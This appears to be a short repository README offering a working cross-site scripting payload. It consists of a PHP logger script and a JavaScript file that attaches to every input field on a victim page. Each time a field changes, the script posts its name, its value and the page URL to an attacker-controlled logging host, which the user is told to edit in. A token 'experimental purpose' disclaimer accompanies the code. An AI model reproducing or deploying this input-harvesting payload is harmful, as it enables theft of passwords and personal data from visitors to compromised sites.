XSS (Cross Site Scripting) payload for stealing user input from victim site.

xsslogger.php

<?php
file_put_contents("xss.log",$_POST["XssGhost"]."\n",FILE_APPEND);
header("Access-Control-Allow-Origin: *");
?>

xssmalware.js

/* xssmaleware.js
 * XSS payload for harvesting user inputs!
 * By Anik Hasibul (github.com/AnikHasibul)
 * Change the $_config.url as your own
 * Only for experimental purpose
 */

var $_config = {
        "url":"http://myMaliciousLogDomain.xom/xsslogger.php" /*EDIT THIS MUST */
}

/* CODE FOR xsslogger.php */
/*

<?php

file_put_contents("xss.log",$_POST["XssGhost"]."\n",FILE_APPEND);
header("Access-Control-Allow-Origin: *");
?>


*/

"use strict";
var $_inputFields = document.querySelectorAll("input");

for(i=0; i< $_inputFields.length; i++) {
        var $_c=$_inputFields[i];
        $_c.onchange = function(){
                var tag = ""
                if(this.id){
                        tag = "ID="+this.id;
                } else if (this.name) {
                        tag = "NAME="+this.name;
                } else {
                        tag = "unknown";
                }
                $_send({"tag":tag,"data":this.value,"source":location.href});
        }
}

if(window.XMLHttpRequest) {
        var $_sync = new XMLHttpRequest();
} else {
        var $_sync = new ActiveXObject("Microsoft.XMLHTTP");
}
function $_send(obj) {
        d = JSON.stringify(obj);
        d = "XssGhost="+d;
        $_sync.open("POST",$_config.url+"?"+Math.random(), true);
        $_sync.setRequestHeader("Content-type","application/x-www-form-urlencoded");
        $_sync.send(d);
}